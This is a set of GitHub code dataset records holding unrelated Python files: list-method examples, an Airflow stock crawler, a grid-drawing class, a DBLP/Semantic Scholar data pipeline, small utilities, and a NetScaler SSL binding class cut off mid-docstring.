[1,2,5,6,7]\nnum.insert(2,3)\nprint(num)\nnum.insert(3,4)\nprint(num)\n\n\n# pop 方法\nx = [1,2,3]\nx.pop()\n3\nprint(x)\nx.pop()\nprint(x)\n\n# remove 方法\ncontent = ['where', 'who', 'lisi', 'cntent', 'who', 'who']\n# 移除了第一个匹配的元素\ncontent.remove('who')\nprint(content)\n\n\n# reverse 方法\nx = [1, 2, 3]\n# 元素反向存储\nx.reverse()\nprint(x)\n\n# sort 方法\nx = [2,3,5,6,1,4,7]\nx.sort()\nprint(x)\n\n# clear 方法\nlist1 = ['baidu', 'google', 12, 23]\nprint(list1)\nlist1.clear()\nprint(list1)\n\n# copy 方法\nlist1 = ['baidu', 'google', 12, 23];\nlist2 = list1.copy()\nprint(list2)\n","repo_name":"JustDoPython/python-100-day","sub_path":"day-008/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"zh","doc_type":"code","stars":699,"dataset":"github-code","pt":"19"}
+{"seq_id":"13203141842","text":"import datetime\n\nfrom airflow.operators.python_operator import (\n PythonOperator,\n)\n\nfrom dataflow.backend import db\nfrom dataflow.crawler.taiwan_stock_price import (\n crawler,\n)\n\n\ndef crawler_taiwan_stock_price_twse(\n **kwargs,\n):\n # 由於在 DAG 層,設定 params,可輸入參數\n # 因此在此,使用以下 kwargs 方式,拿取參數\n # DAG 中 params 參數設定是 date (YYYY-MM-DD)\n # 所以拿取時,也要用一樣的字串\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n # 如果沒有帶參數,則預設 date 是今天\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n # 進行爬蟲\n df = crawler(\n dict(\n date=date,\n data_source=\"twse\",\n )\n )\n # 資料上傳資料庫\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef crawler_taiwan_stock_price_tpex(\n **kwargs,\n):\n # 註解如上\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n df = crawler(\n dict(\n date=date,\n data_source=\"tpex\",\n )\n )\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef create_crawler_taiwan_stock_price_task() -> PythonOperator:\n return [\n # 建立任務\n PythonOperator(\n task_id=\"taiwan_stock_price_twse\",\n python_callable=crawler_taiwan_stock_price_twse,\n queue=\"twse\",\n provide_context=True,\n ),\n PythonOperator(\n task_id=\"taiwan_stock_price_tpex\",\n python_callable=crawler_taiwan_stock_price_tpex,\n queue=\"tpex\",\n provide_context=True,\n ),\n ]\n","repo_name":"FinMind/FinMindBook","sub_path":"DataEngineering/Chapter12/12.8/dataflow/etl/taiwan_stock_price.py","file_name":"taiwan_stock_price.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"}
+{"seq_id":"9811511735","text":"#creating an empty list \nnumbers=[]\n\nn=int(input(\"Enter no of names u1 want to input \"))\n\nfor i in range(0,n):\n element=int(input())\n\n numbers.append(element)\n\n print(numbers)","repo_name":"thebinsohail/Python-Workspace","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"20750351104","text":"\nimport numpy as np\nfrom numpy import inf\nfrom ipycanvas import hold_canvas\nfrom findirection.envs.draw_grid import DrawGrid, Level\nfrom findirection.envs.grid_info import GridInfo\nfrom findirection.envs.arrows import Arrows\nfrom findirection.envs.directions import Direction\n\n\nclass DrawInfo():\n\n arrow_color = '#00008b' \n text_bg_color = 'rgba(40,40,40,0.7)' \n text_fg_color = '#fff' \n\n precision = 3 \n\n\n def __init__( self, draw_grid: DrawGrid, grid_info: GridInfo, **kwargs: dict ):\n \n self.grid = draw_grid.grid\n\n self.grid_info = grid_info\n\n self.draw_grid = draw_grid \n self.canvas = self.draw_grid.canvases[Level.Text]\n\n self.set_properties(kwargs.get('grid',None)) \n\n self.arrows = Arrows( draw_grid.cell_pixels, draw_grid.padding,length=24,width=7,height=11) \n\n\n def draw( self, props: dict ):\n\n if props is not None: \n self.precision = props.get('precision', self.precision)\n directions = props.get('directions',None)\n if directions is not None: \n self.process_direction_arrows(directions)\n self.process_direction_text(directions)\n\n self.process_text(props)\n\n self.process_info(props)\n\n if props.get('coords',False):\n self.draw_coordinates()\n\n\n\n def set_default_values(self,args): \n \n defaultargs = ((0,0),\"\",190,20)\n\n args += (None,)*len(defaultargs) \n\n args = tuple(map(lambda x, y: y if y is not None else x, defaultargs, args))\n return args\n\n\n def process_info(self,info):\n\n fg_color = 'black'\n bk_color = 'white'\n\n text = info.get('side_info',None)\n if text is not None: \n\n if self.draw_grid.side_panel is None:\n raise Exception(\"\\'side_panel\\' must be specified during grid creation to allow side panel text.\")\n\n if type(self.draw_grid.side_panel) == dict:\n fg_color = self.draw_grid.side_panel.get('text_fg','black') \n bk_color = self.draw_grid.side_panel.get('color','white') \n\n if self.draw_grid.side_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n text = info.get('bottom_info',None)\n if text is not None: \n\n if self.draw_grid.bottom_panel is None:\n raise Exception(\"\\'bottom_panel\\' must be specified during grid creation to allow bottom panel text.\")\n\n if type(self.draw_grid.bottom_panel) == dict:\n fg_color = self.draw_grid.bottom_panel.get('text_fg','black') \n bk_color = self.draw_grid.bottom_panel.get('color','white') \n\n if self.draw_grid.bottom_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n cy += self.draw_grid.height_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cy += self.draw_grid.height_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n def process_text(self,info):\n\n text = info.get('text',None) \n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_text_array(text)\n else:\n for (cx,cy),value in text: \n self.draw_cell_text(cx,cy,value)\n\n\n def process_direction_arrows(self,directions):\n\n arrows = directions.get('arrows',None)\n if arrows is not None:\n if isinstance(arrows,np.ndarray):\n self.draw_direction_arrow_array(arrows) \n else: \n\n if len(arrows) > 0 and (type(arrows[0][0]) == int): \n for (cx,cy) in arrows:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_arrow(cx,cy,direction) \n\n else:\n for (cx,cy),direction in arrows: \n self.draw_direction_arrow(cx,cy,direction) \n\n\n def process_direction_text(self,directions):\n\n text = directions.get('text',None)\n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_direction_text_array(text) \n else:\n if len(text) > 0 and (type(text[0][0]) == int): \n for (cx,cy) in text:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_text(cx,cy,direction) \n\n else:\n for (cx,cy),direction in text: \n self.draw_direction_text(cx,cy,direction) \n\n\n\n def set_properties( self, grid_props: dict ):\n\n if grid_props is not None:\n colors = grid_props.get('colors',None)\n if colors is not None: \n self.arrow_color = colors.get('arrows', self.arrow_color) \n self.text_fg_color = colors.get('text_fg', self.text_fg_color) \n self.text_bg_color = colors.get('text_bg', self.text_bg_color) \n\n\n \n def draw_direction_arrow( self, x, y, directions ): \n \n canvas = self.draw_grid.canvases[Level.Overlay]\n color = self.arrow_color \n padding = self.draw_grid.padding\n cell_pixels = self.draw_grid.cell_pixels\n px,py = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n\n with hold_canvas(canvas): \n canvas.clear_rect(px,py,cell_pixels,cell_pixels)\n\n with hold_canvas(canvas): \n self.arrows.draw(canvas,px,py,directions,color) \n\n\n def draw_direction_arrow_array(self, directions: np.array):\n canvas = self.draw_grid.canvases[Level.Overlay] \n with hold_canvas(canvas): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n self.draw_direction_arrow( x, y, directions[y,x]) \n\n\n \n def draw_direction_text( self, x, y, direction ):\n self.draw_cell_text( x, y, Direction.get_string(direction) )\n\n\n def draw_direction_text_array(self,directions): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n if x != self.grid.end[0] or y != self.grid.end[1]: \n self.draw_direction_text( x, y, directions[y,x]) \n \n\n def draw_coordinates(self):\n with hold_canvas(self.canvas): \n for y in range(self.draw_grid.grid.height):\n for x in range(self.draw_grid.grid.width):\n self.draw_cell_text( x, y, f\"({x},{y})\") \n \n\n\n def draw_text_array(self,text):\n with hold_canvas(self.canvas): \n for y in range(text.shape[0]):\n for x in range(text.shape[1]):\n self.draw_cell_text( x, y, text[y,x]) \n\n\n def info_panel_text( self, x, y, text,width,height, \n fg_color='#000', \n bk_color='#fff',\n font='bold 14px sans-serif',\n text_align='left',\n text_baseline='top'): \n canvas = self.canvas\n canvas.save()\n with hold_canvas(canvas): \n canvas.fill_style = fg_color\n canvas.text_align = text_align\n canvas.text_baseline = text_baseline\n canvas.font = font\n canvas.fill_text(text, x, y)\n canvas.restore()\n\n\n def clear_info_panel_text( self, x, y, width, height, bk_color='#fff'):\n canvas = self.canvas\n with hold_canvas(canvas): \n canvas.fill_style = bk_color \n canvas.fill_rect(x,y-5,width,height) \n\n\n def draw_cell_text( self, x, y, value, color = None, back_color = None ): \n num_value = False\n if type(value).__name__.startswith('str'):\n if len(value) == 0:\n return\n elif isinstance(x, (int, float, complex)) and not isinstance(x, bool):\n num_value = True\n if np.isnan(value):\n return\n\n if self.grid.test_for_base_area(x,y): \n return\n \n if isinstance(value, float):\n if self.precision == 0:\n value = value.astype(int)\n else:\n value = round(value,self.precision) \n \n canvas = self.canvas\n padding = self.draw_grid.padding\n\n if color is None: color = self.text_fg_color\n if back_color is None: back_color = self.text_bg_color\n\n gx,gy = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n cx,cy = self.draw_grid.get_center(gx,gy) \n\n bk_height = 20\n bk_width = 36\n\n if len(str(value)) > 4:\n bk_width += (len(str(value))-4) * 6\n\n if bk_width > (self.draw_grid.cell_pixels - 4):\n bk_width = (self.draw_grid.cell_pixels - 4)\n\n x_off = (bk_width//2)\n y_off = (bk_height//2)\n\n font_size = 14\n text_offset = 5\n if (num_value and self.precision > 1) or \\\n (not num_value and len(str(value)) >= 3):\n font_size = 12 \n text_offset = 4\n font_str = f\"bold {font_size}px sans-serif\"\n\n canvas.save()\n\n with hold_canvas(canvas): \n canvas.clear_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n if back_color is not None:\n canvas.fill_style = back_color \n canvas.fill_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n\n with hold_canvas(canvas): \n canvas.fill_style = color\n canvas.text_align = 'center'\n canvas.font = font_str\n canvas.fill_text(f\"{value}\", cx, cy+text_offset)\n\n canvas.restore()","repo_name":"arman-zhumakhan/arman-zhumakhan.github.io","sub_path":"projects/reinforcement-learning-project/findirection/envs/draw_info.py","file_name":"draw_info.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"10663816718","text":"import urllib.request\nimport shutil\nimport gzip\nimport json\nimport os\nimport re\nfrom collections import defaultdict\n\nfrom tqdm import tqdm\n\nfrom dblp_parser import parse_dblp, parse_dblp_person, get_dblp_country\n\nDATA_PATH = \"../data/\"\nDBLP_URL = 'https://dblp.org/xml/'\nSEMANTIC_SCHOLAR_URL = 'https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/2020-01-01/'\n\n\ndef download_dblp() -> None:\n \"\"\"\n This functions downloads the DBLP XML and DTD.\n \"\"\"\n source_gz = DBLP_URL + 'release/dblp-2020-01-01.xml.gz'\n source_dtd = DBLP_URL + 'release/dblp-2019-11-22.dtd'\n target_gz = DATA_PATH + 'dblp.xml.gz'\n target_dtd = DATA_PATH + 'dblp-2019-11-22.dtd'\n\n print('Downloading file ' + source_gz)\n with urllib.request.urlopen(source_gz) as response, open(target_gz, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Downloading file ' + source_dtd)\n with urllib.request.urlopen(source_dtd) as response, open(target_dtd, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Download finish!')\n print()\n\n\ndef unzip_dblp() -> None:\n \"\"\"\n This functions unzip the DBLP dataset.\n \"\"\"\n source = DATA_PATH + 'dblp.xml.gz'\n target = DATA_PATH + 'dblp.xml'\n\n with gzip.open(source, 'rb') as f_in:\n with open(target, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print()\n\n\ndef extract_publications() -> None:\n \"\"\"\n Reading the DBLP XML and parse it into a json file for further processing.\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'dblp.json'\n\n print('Parsing ' + source)\n parse_dblp(source, target)\n print('Parse finish! File dblp.json created!')\n print()\n\n\ndef extract_ai_publications(source: str = DATA_PATH + 'dblp.json',\n target: str = DATA_PATH + 'ai_dblp.json') -> set:\n \"\"\"\n Extracting the AI publications from the DBLP dataset.\n :param source: From where to read the pubs.\n :param target: Where to write the pubs to.\n :return: List of authors, which have published an AI publication\n \"\"\"\n source_venues = DATA_PATH + '../ai_venues.json'\n\n with open(source_venues, \"r\", encoding=\"utf-8\") as f:\n venues = json.load(f)\n venues = {a for b in venues.values() for a in b}\n\n authors = set()\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if line['booktitle']:\n curr_venue = line['booktitle'][0]\n elif line['journal']:\n curr_venue = line['journal'][0]\n else:\n continue\n curr_venue = re.sub(\" \\\\([0-9]+\\\\)$\", \"\", curr_venue)\n if curr_venue in venues:\n line['venue'] = curr_venue\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n authors.update(line['author'])\n print('Parse finish! File created!')\n print()\n return authors\n\n\ndef extract_persons(author_set: set) -> None:\n \"\"\"\n Extracting person information from DBLP and write it down.\n Note that we exclude person records that have the\n publtype disambiguation.\n :param author_list: A list of authors,\n which have published an AI publication\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'persons.json'\n\n print('Parsing ' + source)\n parse_dblp_person(source, target, author_set)\n print('Parse finish! File persons.json created!')\n print()\n\n\ndef parse_countries():\n \"\"\"\n Extracting countries for all authors in the AI DBLP.\n Countries are found using a possible country file.\n \"\"\"\n source_person = DATA_PATH + 'persons.json'\n source_country = DATA_PATH + '../poss_countries.txt'\n target = DATA_PATH + 'author_countries.json'\n\n get_dblp_country(source_person, source_country, target)\n print('Parse finish! File author_countries.json created!')\n print()\n\n\ndef extract_community_publications() -> None:\n \"\"\"\n Extracts all publications that have at least one author\n that we consider as an AI author.\n \"\"\"\n source = DATA_PATH + 'dblp.json'\n source_persons = DATA_PATH + 'persons.json'\n target_pubs = DATA_PATH + \"ai_community_dblp.json\"\n with open(source_persons, encoding=\"utf-8\") as file:\n persons = [json.loads(line) for line in file]\n # Put all author names into set\n authors = {}\n for person in persons:\n author_name = person[\"author\"]\n if isinstance(author_name, list):\n for a in author_name:\n authors[a] = person[\"key\"]\n elif isinstance(author_name, str):\n authors[author_name] = person[\"key\"]\n with open(target_pubs, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if \"author\" in line:\n matched_authors = [a for a in line[\"author\"]\n if a in authors]\n if matched_authors:\n line[\"ai_authors\"] = matched_authors\n line[\"ai_authors_keys\"] = [authors[author] for author\n in matched_authors]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished community_dblp.json file!\")\n print()\n\n\n# --- Helper for Extract Semantic scholar ---\ndef download_semantic_scholar_if_needed(semantic_scholar_path: str,\n default_count: int = 181) -> None:\n \"\"\"\n Helper file for match semantic scholar. Downloads the whole corpus.\n \"\"\"\n if not os.path.exists(semantic_scholar_path):\n os.mkdir(semantic_scholar_path)\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + \"manifest.txt\") as response:\n with open(semantic_scholar_path + \"manifest.txt\", 'wb') as fh:\n shutil.copyfileobj(response, fh)\n with open(semantic_scholar_path + \"/manifest.txt\", \"r\") as f:\n for line in tqdm(f, total=default_count):\n line = line.strip()\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + line) as response:\n with open(semantic_scholar_path + line, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n\n\ndef get_doi(line) -> str:\n \"\"\"\n Get doi for a given line of the data, useful for semantic_scholar matching\"\n \"\"\"\n if \"ee\" in line:\n for x in line[\"ee\"]:\n if \"doi\" in x:\n return x.replace(\"https://doi.org/\", \"\")\n\n\ndef match_semantic_scholar() -> None:\n \"\"\"\n Match all the publications to Semantic Scholar. Also downloads Semantic Scholar\n if needed. Writes the matched data to ai_community_dataset.json\n \"\"\"\n source = DATA_PATH + 'ai_community_dblp.json'\n target = DATA_PATH + 'ai_community_dataset.json'\n semantic_scholar_path = DATA_PATH + \"semantic_scholar/\"\n download_semantic_scholar_if_needed(semantic_scholar_path)\n\n with open(source, \"r\", encoding=\"utf-8\") as f:\n pubs = f.readlines()\n pubs = [json.loads(x) for x in pubs]\n removed_indices = set()\n titles = defaultdict(list)\n [titles[x['title'].strip(\".\").lower()].append(i)\n for i, x in enumerate(pubs)]\n files = [file_path for file_path in os.listdir(semantic_scholar_path)\n if \"s2-corpus-\" in file_path]\n counter = 1\n with open(target, 'w', encoding=\"utf-8\") as out_f:\n for file_path in files:\n print(\"Reading file ... (\",\n str(counter), \"/\",\n str(len(files)), \")\")\n with gzip.open(semantic_scholar_path + file_path,\n 'rt',\n encoding=\"utf-8\") as in_f:\n for line in in_f:\n line = json.loads(line)\n curr_title = line['title'].strip().lower()\n if curr_title in titles:\n index = None\n for i in titles[curr_title]:\n pub = pubs[i]\n doi = get_doi(pub)\n if doi and \"doi\" in line and line[\"doi\"]:\n if doi == line[\"doi\"]:\n index = i\n break\n elif \"year\" in line and int(pub[\"year\"]) == int(line[\"year\"]):\n if line[\"venue\"] == \"ArXiv\":\n if pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n index = i\n break\n elif pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n continue\n else:\n index = i\n break\n if index and index not in removed_indices:\n if 'abstract' not in pub:\n pub['abstract'] = line['paperAbstract']\n if 'in_citations' not in pub:\n pub['in_citations'] = line['inCitations']\n if 'out_citations' not in pub:\n pub['out_citations'] = line['outCitations']\n if 'ss_id' not in pub:\n pub['ss_id'] = line['id']\n if 'doi' not in pub and 'doi' in line:\n pub['doi'] = [line['doi']]\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n removed_indices.add(index)\n counter += 1\n for i, pub in enumerate(pubs):\n if i not in removed_indices:\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n print(\"Finished. \")\n\n\ndef extract_german_ai(source: str = DATA_PATH + 'ai_community_dataset.json',\n target: str = DATA_PATH + 'german_ai_community_dataset.json') -> None:\n \"\"\"\n Extracts all publications in which at least one author is flagged as\n german.\n \"\"\"\n countries = DATA_PATH + 'author_countries.json'\n with open(countries, \"r\", encoding=\"utf-8\") as f:\n countries = f.readlines()\n countries = [json.loads(x) for x in countries]\n german_authors = [(x['author'], x['key']) for x in countries\n if \"Germany\" in x[\"countries\"]]\n german_names = {}\n for author, dblp_id in german_authors:\n if isinstance(author, list):\n for aut in author:\n german_names[aut] = dblp_id\n elif isinstance(author, str):\n german_names[author] = dblp_id\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n german_as = [auth for auth in line[\"ai_authors\"]\n if auth in german_names]\n if german_as:\n line[\"german_ai_authors\"] = german_as\n line[\"german_ai_authors_keys\"] = [german_names[name]\n for name in german_as]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished extracting german AI publications. \")\n\n\ndef extrat_german_persons(person_source: str = DATA_PATH + 'persons.json',\n data_source : str = DATA_PATH + 'german_ai_community_dataset.json',\n target : str = DATA_PATH + 'german_persons.json') -> None:\n \"\"\"\n Writes all german authors into an author file.\n \"\"\"\n german_keys = set()\n with open(data_source) as file:\n for line in file:\n line = json.loads(line)\n german_keys.update(line[\"german_ai_authors_keys\"])\n with open(target, 'w') as out_file:\n with open(person_source) as in_file:\n for line in in_file:\n line = json.loads(line)\n if line[\"key\"] in german_keys:\n json.dump(line, out_file)\n out_file.write(\"\\n\")\n print(\"Finished extracting all german AI authors!\")\n\n\nif __name__ == '__main__':\n print('**** Starting pipeline process to create AI Datasets****')\n print()\n if not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\n print('Process 01 - Download dblp data')\n download_dblp()\n\n print('Process 02 - Unzipping dblp data')\n unzip_dblp()\n\n print('Process 03 - Create dblp.json')\n extract_publications()\n\n print('Process 04 - Create ai_dblp.json')\n author_set = extract_ai_publications()\n\n print('Process 05 - Create persons.json')\n extract_persons(author_set)\n\n print('Process 06 - Create author_countries.json')\n parse_countries()\n\n print(\"Process 07 - Create ai_community_dblp.json\")\n extract_community_publications()\n\n print('Process 08 - Extract Semantic scholar information for the AI community.')\n match_semantic_scholar()\n\n print('Process 09 - Extract Semantic scholar information for the AI data')\n # Just filter relevant publications from the AI community dataset, no\n # need for going throguh Semantic Scholar again.\n extract_ai_publications(source=DATA_PATH+'ai_community_dataset.json',\n target=DATA_PATH+'ai_dataset.json')\n\n print('Process 10 - Extract publications from German AI authors.')\n extract_german_ai()\n extract_german_ai(source=DATA_PATH + 'ai_dataset.json',\n target=DATA_PATH + 'german_ai_dataset.json')\n\n print('Process 11 - Extract German AI authors')\n extrat_german_persons()\n\n print('*** Pipeline process to create the data sets finished! ***')\n","repo_name":"TobiasKoopmann/ai-network","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"15404750819","text":"import numpy as np\n\ndef geo2helio(r_so,rhat_ob,d):\n\t\"\"\"\n\tReturn the scalar multiplier for 'rhat_ob' that yields an 'r_so' of length 'd'\n\tNB: a=1 so we can omit it from calcs\n\t\"\"\"\n\n\tis_arr = isinstance(rhat_ob,np.ndarray) and rhat_ob.ndim==2\n\n\tif is_arr:\n\t\tb = 2*np.sum(r_so*rhat_ob,axis=1)\n\t\tc = -1*(d**2 - np.sum(r_so*r_so,axis=1))\n\telse:\n\t\tb = 2*np.dot(rhat_ob,r_so)\n\t\tc = -1*(d**2 - np.dot(r_so,r_so))\n\n\ts = np.sqrt(b**2 - 4*c)\n\tr0 = (-b + s)/2.0\n\tr1 = (-b - s)/2.0\n\n\tif is_arr:\n\t\talpha = np.max(np.vstack((r0,r1)).T,axis=1)\n\t\talpha[alpha<0] = np.nan\n\telse:\n\t\talpha = np.max((r0,r1))\n\t\tif alpha<0:\n\t\t\talpha = np.nan\n\n\treturn alpha\n","repo_name":"bengebre/geo2helio","sub_path":"geo2helio.py","file_name":"geo2helio.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3103313404","text":"import models\n\nclass LineupService:\n def create_lineups(self, match_json):\n dire = []\n radiant = []\n\n if('players' in match_json):\n heroes = match_json['players']\n count = 0\n\n for hero in heroes:\n if count < 5:\n radiant.append(hero['hero_id'])\n else:\n dire.append(hero['hero_id'])\n count += 1\n else:\n radiant_heroes = match_json['radiant']['heroes']\n dire_heroes = match_json['dire']['heroes']\n\n for hero in radiant_heroes:\n radiant.append(hero['id'])\n\n for hero in dire_heroes:\n dire.append(hero['id'])\n\n\n radiant_lineup = models.Lineup(radiant)\n dire_lineup = models.Lineup(dire)\n\n return {\n 'radiant': radiant_lineup,\n 'dire': dire_lineup\n }\n","repo_name":"scsper/dota-lineup-analyzer","sub_path":"old/server/services/lineup_service.py","file_name":"lineup_service.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2623855874","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslvserver_sslpolicy_binding(base_resource) :\n\t\"\"\" Binding class showing the sslpolicy that can be bound to sslvserver.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._policyname = None\n\t\tself._priority = None\n\t\tself._type = None\n\t\tself._polinherit = None\n\t\tself._gotopriorityexpression = None\n\t\tself._invoke = None\n\t\tself._labeltype = None\n\t\tself._labelname = None\n\t\tself._vservername = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service. Minimum value = 0 Maximum value = 65534.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service. Minimum value = 0 Maximum value = 65534\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef policyname(self) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@policyname.setter\n\tdef policyname(self, policyname) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._policyname = policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labelname(self) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labelname.setter\n\tdef labelname(self, labelname) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labelname = labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef vservername(self) :\n\t\tr\"\"\"Name of the SSL virtual server. Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@vservername.setter\n\tdef vservername(self, vservername) :\n\t\tr\"\"\"Name of the SSL virtual server. Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._vservername = vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef gotopriorityexpression(self) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@gotopriorityexpression.setter\n\tdef gotopriorityexpression(self, gotopriorityexpression) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._gotopriorityexpression = gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef invoke(self) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@invoke.setter\n\tdef invoke(self, invoke) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._invoke = invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef type(self) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert. Default value: REQUEST Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, 